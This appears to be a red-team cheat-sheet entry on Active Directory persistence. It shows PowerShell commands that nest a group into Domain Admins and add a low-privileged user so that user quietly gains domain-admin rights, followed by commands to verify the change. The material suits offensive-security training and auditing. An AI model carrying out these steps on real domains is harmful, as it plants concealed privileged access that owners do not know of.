Group Persistence
Required Privileges:
Administrators
SCENARIO
We have the IT Group which has Two Nested Groups
in the Internet Access Group named NestGroup-1 - NestGroup-2
.
Let's add NestGroup-2
Group to the Domain Admins Group.
Add-ADGroupMember -Identity "Domain Admins" -Members "NestGroup-2"
Add our Low-Privileged AD User to the first Group NestGroup-1
.
Add-ADGroupMember -Identity "NestGroup-1" -Members "<Low Privileged AD Username>"
Verifying the Access
Our Low-Privileged User should now have Updated Privileged Access on the Domain. We can verify that our user is now Part of the New Groups with the following Command.
:: Displays the User Groups to which the Current User Belongs
whoami /groups
We can Verify the New Members in the Domain Admins
Group with this Command.
Get-ADGroupMember -Identity "Domain Admins"